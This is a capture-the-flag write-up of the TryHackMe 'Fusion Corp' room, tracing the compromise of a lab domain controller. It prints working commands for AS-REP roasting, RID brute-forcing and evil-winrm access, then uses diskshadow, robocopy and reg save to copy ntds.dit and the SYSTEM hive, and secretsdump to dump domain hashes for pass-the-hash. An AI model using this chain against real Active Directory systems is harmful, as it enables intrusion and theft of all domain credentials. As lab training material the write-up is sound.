https://tryhackme.com/room/fusioncorp
Enumeration:
I began the enumeration with a quick rustscan and found 22 open ports on the target machine.
sudo rustscan -a 10.10.227.87 -- -sC -sV -vv -oN fusion_nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: eBusiness Bootstrap Template
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-07-16 08:57:35Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FUSION
| NetBIOS_Domain_Name: FUSION
| NetBIOS_Computer_Name: FUSION-DC
| DNS_Domain_Name: fusion.corp
| DNS_Computer_Name: Fusion-DC.fusion.corp
| Product_Version: 10.0.17763
|_ System_Time: 2023-07-16T08:58:27+00:00
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-15T08:36:38
| Not valid after: 2024-01-14T08:36:38
| MD5: d747 3ab3 4a02 7ef2 886c eeec 5082 2609
| SHA-1: dd0e 0696 cb85 2535 508c c02f 88ba 9fec afbe 7f8c
| -----BEGIN CERTIFICATE-----
| MIIC7jCCAdagAwIBAgIQMK888Y3p9ZFNfpn8LgqG/zANBgkqhkiG9w0BAQsFADAg
| MR4wHAYDVQQDExVGdXNpb24tREMuZnVzaW9uLmNvcnAwHhcNMjMwNzE1MDgzNjM4
| WhcNMjQwMTE0MDgzNjM4WjAgMR4wHAYDVQQDExVGdXNpb24tREMuZnVzaW9uLmNv
| cnAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDSSbWayNCvAP7U0Nnu
| 3CR+DFQbovPnJm8boLS9cfgJNDxVnN+hra67QstLkZxWirF9GzF7VsqIbvI/RI+M
| gHUJeE/ORP1eZfgeEX63pxFdFUYJ2x6jicIOnqCP8NUNw6diomhw4oDa6TwUavF6
| WQsp6oBpJVCoUrHBHro9HwexBk6KNgcgd+C8K3aVtyhXO4F/Tz3SvHdheE+WwxWc
| h38YV5QoAwpLFSI7RWq9bWEEO91VoDAvuC9uevpGpXYDCCSYIQJtHIhSHST3p4rM
| WkS9lEA6rCAY+gxLwVWq+n2GA/S5cs9QNO3/098YVy2uGnGVsUGlZBJAwUfSZ7Vh
| rIv1AgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDAN
| BgkqhkiG9w0BAQsFAAOCAQEAhhA4ONitH+0zYFqonFcDugDYEDmVYb80PA1K0Yxb
| 0q8gsfKKrtLDgcWgZ3V26wx8a+9yrWg4bvopshELl0O6jxUmfjaDKLzxEJEVcAKf
| Q8RrrMkjvHtjEWNdXXi8OGuab6Tvi1NX5YtyavRbful6YyHNUwGQMGcO0cYJVWSq
| epObHlF9NBpCOtPL8XYckkBRj4J6TcpkcBmNLO+VDX2F4m5u3Le/YDYEYSeBTJXb
| ViCig9TCCOubAPkKKcgtdZahHHA7w7JDFczrEKF0nLUMzneeONd6sPN6BLgSlsiX
| m+wyy7RfJGUwmJXIehj8EOuwPdouCxEJZUE6TXXFVLXDKQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2023-07-16T08:59:06+00:00; +3s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49699/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 28062/tcp): CLEAN (Timeout)
| Check 2 (port 55242/tcp): CLEAN (Timeout)
| Check 3 (port 43510/udp): CLEAN (Timeout)
| Check 4 (port 3493/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-07-16T08:58:28
|_ start_date: N/A
After obtaining the port scan results, I observed a domain named “fusion.corp” and a DC (Domain Controller) running with the name “Fusion-DC.fusion.corp”. I added the domain to the hosts file and accessed it to gather more information.
DNS Enumeration:
To gather more information about the target, I performed DNS enumeration using the dig command and ran vhost enumeration to find other available sub-domains.
dig fusion.corp any @10.10.41.28
dig fusion.corp any @10.10.41.28 -t NS #to check name server
dig all fusion.corp @10.10.41.28
During the DNS enumeration, I didn’t discover anything new that wasn’t already found in the port scan results. However, during vhost enumeration, I found one more sub-domain named “goods” that is running in the fusion corp network.
ffuf -H "Host: FUZZ.fusion.corp" -u http://10.10.41.28 -w /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 53888
I added this new sub-domain to the hosts file as well for further enumeration.
Web Enumeration:
Upon browsing through the website, I observed that they are providing various IT services:
To further enumerate the website, I performed directory enumeration and found new sub-directories in the result:
gobuster dir -u http://fusion.corp -t 20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o fusion_web -b 404,403 -k
In one of the sub-directory named “backup”, I found an .ods file which contains some employee-related data.
When I checked the file, I discovered that it contains the names of some employees and their internal usernames present in the Excel sheet.
Kerberoasting:
After extracting the usernames and creating a new user list, I attempted to perform AS-REP roasting and discovered that out of 11 users, I successfully obtained a hit for the user ‘lparker’ for whom Kerberos pre-authentication was disabled.
I used hashcat to crack the hash, and within seconds, I obtained the plain-text password from the cracked hash. 🙂
Using the plain-text password, I tried to log in using Evil-winrm and successfully gained access. After logging in, I found the first flag on the user’s desktop.
Further Enumeration:
After gaining access to the user lparker, I decided to perform a RID brute-force using CrackMapExec with his credentials to check for more users present in the network. To my surprise, I discovered another user named ‘jmurphy’.
crackmapexec smb fusion.corp -u "lparker" -p '*************' --rid-brute
During my manual search for any lateral movement vector, I couldn’t find anything. However, I decided to run the ‘net user’ command against the user ‘jmurphy’ just to try my luck. To my astonishment, I found that there was a huge OpSec failure, as the password of the user ‘jmurphy’ was mentioned in the comment.
net user /dom jmurphy
I used these credentials to log into the ‘jmurphy’ account using WinRM and successfully obtained the 2nd flag. (pwn3d!🙂)
Privilege Escalation:
After gaining access to the user jmurphy, I performed manual enumeration and executed the command below to check the user’s privileges:
whoami /all
The output of the whoami command showed that the user “jmurphy” has “SeBackupPrivilege” and “SeRestorePrivilege” enabled.
As I searched on the internet, I found a blog that described how “SeBackupPrivilege” provides users with full read permissions and the ability to create system backups. This privilege allows users to read any file on the machine, including sensitive files like SAM, SYSTEM hives, or NTDS.dit.
An attacker can leverage this privilege to extract the hashes from these files and either crack them or pass them (PTH) to elevate their shell.
In workstations, we need the SAM and System hive files to extract the hashes, while in domain controller machines, we need the ntds.dit file and system hive .
The blog mentioned three ways to obtain the “ntds.dit” file which contains all the hashes. I decided to follow the “Diskshadow + Robocopy” process.
Diskshadow is a Windows built-in utility that can create copies of a drive that is currently in use. So, at first I need to create a script file with all the commands needed to create a copy of the hash file, either SAM or NTDS.dit files in which we can extract them later locally.
I used a script file with the necessary commands to create a copy of the “ntds.dit” file, which we can extract later.
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
I uploaded the script to the Fusion Corp machine and used the Diskshadow utility to run the script.
diskshadow /s diskshadow.txt
After the completion of the Diskshadow process, a new backup drive ‘E’ was created, and I could navigate into that drive.
Even though I was in the backup drive, I still did not have access to the files in the Administrator folder. However, I could create a copy of the NTDS.dit file, as I had backup privileges.
So, I created a backup of NTDS.dit from the E: drive in the temp folder using the robocopy function.
robocopy /b E:\Windows\ntds . ntds.dit
After obtaining the NTDS.dit file, I needed another file called “system,” which works as an encryption key to decrypt the credentials from the NTDS.dit file.
To extract the “SYSTEM” file from the registry into our temp directory, I used the following command:
reg save hklm\system c:\temp\system
After having both files, I transferred them to my Kali host and used “secretsdump” to dump all the hashes.
impacket-secretsdump -ntds ntds.dit -system system local
After dumping the hashes of all the users from the NTDS.dit file, I didn’t crack any of them. Instead, I used the Administrator hash to log in.
After logging in successfully, I retrieved the final flag. (pwn3d!🙂)